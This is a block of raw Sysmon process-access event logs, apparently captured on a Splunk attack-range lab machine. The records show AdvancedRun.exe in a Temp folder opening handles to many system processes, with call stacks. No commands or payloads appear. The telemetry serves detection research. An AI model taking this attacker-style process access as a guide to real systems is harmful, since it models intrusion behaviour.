20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079761Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079760Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004079759Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079758Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079757Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079756Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079754Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079753Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079752Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079751Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079750Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079748Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\